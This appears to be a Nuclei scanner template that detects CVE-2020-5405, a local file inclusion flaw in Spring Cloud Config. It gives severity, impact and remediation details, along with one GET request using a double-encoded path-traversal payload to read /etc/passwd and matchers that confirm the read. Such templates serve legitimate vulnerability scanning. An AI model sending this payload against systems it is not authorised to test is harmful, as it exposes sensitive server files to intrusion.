id: CVE-2020-5405 info: name: Spring Cloud Config - Local File Inclusion author: harshbothra_ severity: medium description: Spring Cloud Config versions 2.2.x prior to 2.2.2, 2.1.x prior to 2.1.7, and older unsupported versions are vulnerable to local file inclusion because they allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. impact: | An attacker can read sensitive files on the server, potentially leading to unauthorized access, data leakage, or further exploitation. remediation: | Upgrade to a patched version of Spring Cloud Config or apply the recommended security patches to mitigate the vulnerability. reference: - https://pivotal.io/security/cve-2020-5405 - https://nvd.nist.gov/vuln/detail/CVE-2020-5405 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N cvss-score: 6.5 cve-id: CVE-2020-5405 cwe-id: CWE-22,CWE-23 epss-score: 0.00258 epss-percentile: 0.63361 cpe: cpe:2.3:a:vmware:spring_cloud_config:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: vmware product: spring_cloud_config tags: cve,cve2020,lfi,springcloud,vmware http: - method: GET path: - '{{BaseURL}}/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd' matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - type: status status: - 200 # digest: 4a0a00473045022002c88a6fbe0fd36e42620e3f6d7d4ea9d72ed776ec984599e77345bb057342e2022100f9d56936961822f9bd1a4350d8f990e91c3f3f36e2c35b405ea2a129b3b6255e:922c64590222798bb761d5b6d8e72950